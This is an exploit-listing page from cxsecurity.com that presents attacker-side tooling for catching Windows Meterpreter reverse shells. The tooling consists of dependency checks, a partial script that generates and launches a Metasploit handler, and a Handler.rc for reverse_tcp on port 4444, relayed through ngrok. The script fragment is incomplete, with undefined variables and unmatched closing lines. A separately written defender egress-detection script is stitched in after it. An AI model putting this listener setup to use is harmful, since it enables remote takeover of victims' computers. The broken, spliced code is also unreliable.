Windows x32-x64 MSFVenom TCP/80-4444 Remote Management Exploit

2020.06.21
Gaddar (TR)
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

#Author : Gaddar
#Team : SiyahBayrak Turkish Vulnerability Researchers
#Video : https://youtu.be/oPBI0ELz44g
#Note : I used the CatchYou software in the video. It can also be exploited without software.
#Tested on Kali Linux 2020.2
#Payload Tested on Win10 x64 and Win7 x64
#Instagram : @pt.php

Exp;

command -v msfvenom > /dev/null 2>&1 || { echo >&2 ;exit 1; }
command -v i686-w64-mingw32-gcc > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v base64 > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v zip > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v netcat > /dev/null 2>&1 || { echo >&2; exit 1; }

Requirements;

Ngrok or other dns services. (https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip) - For amd64
Netcat : "nc [options] 127.0.0.1 4444"

Metasploit Framework;

default_listr="Y"
read -p $'\n\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Start Metasploit Listener? \e[0m\e[1;77m[Y/n]\e[0m\e[1;33m: \e[0m' listr
listr="${listr:-${default_listr}}"
if [[ $listr == Y || $listr == y || $listr == Yes || $listr == yes ]]; then
    printf "use exploit/multi/handler\n" > handler.rc
    printf "set payload %s\n" $payload_msf >> handler.rc
    if [[ $forward == true ]];then
        printf "set LHOST 127.0.0.1\n" >> handler.rc
    else
        printf "set LHOST %s\n" $server_tcp >> handler.rc
    fi
    printf "set LPORT %s\n" $server_port >> handler.rc
    #printf "set ExitOnSession false\n" >> handler.rc
    #printf "exploit -j -z\n" >> handler.rc
    printf "exploit\n" >> handler.rc
    msfconsole -r handler.rc
    rm -rf handler.rc
fi
fi
}

Note : Handler.rc on CatchYou

Handler.rc;

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp [default]
set LHOST 127.0.0.1
set LPORT 4444
exploit
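
A defender-side check for the traffic the handler settings above produce (reverse TCP to LPORT 4444, optionally relayed through ngrok), added here as an example and not part of the original listing or the CatchYou script. The log format, the function names, the sample lines and the `*.tcp.ngrok.io` hostname pattern for ngrok TCP tunnels are assumptions.

```shell
#!/usr/bin/env bash
# Added example: flag outbound flows that match the listener settings in the
# listing (LPORT 4444, ngrok forwarding). Not code from the original page.

# Constructed sample egress log, assumed format:
#   <time> <src_ip> <dst_host> <dst_port> <proto>
sample_log() {
cat <<'EOF'
2020-06-21T10:00:01 10.0.0.15 update.example.com 443 tcp
2020-06-21T10:00:07 10.0.0.22 203.0.113.50 4444 tcp
2020-06-21T10:01:13 10.0.0.22 0.tcp.ngrok.io 17823 tcp
2020-06-21T10:02:40 10.0.0.31 intranet.example.com 80 tcp
2020-06-21T10:03:05 10.0.0.40 198.51.100.9 4444 udp
EOF
}

# Reads log lines on stdin and prints "<reason> <src_ip> <dst_host>:<dst_port>"
# for every suspicious TCP flow.
flag_egress() {
  awk '
    # Skip malformed lines and anything that is not TCP (the payload is reverse_tcp).
    NF < 5 || $5 != "tcp" { next }
    # 4444 is the LPORT written into Handler.rc on the page.
    $4 == 4444 { print "default-lport", $2, $3 ":" $4; next }
    # Assumed ngrok TCP tunnel naming; the remote port is assigned per tunnel.
    tolower($3) ~ /(^|\.)tcp\.ngrok\.io$/ { print "ngrok-tcp-tunnel", $2, $3 ":" $4; next }
  '
}

# Internal hosts with at least one flagged flow, sorted and de-duplicated.
flagged_hosts() {
  flag_egress | awk '{ print $2 }' | sort -u
}

sample_log | flag_egress
```

Port 80, the other port in the title, is left out of the rule because it is too common to flag on its own; egress filtering or proxy inspection is the better control for it.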



Copyright 2020, cxsecurity.com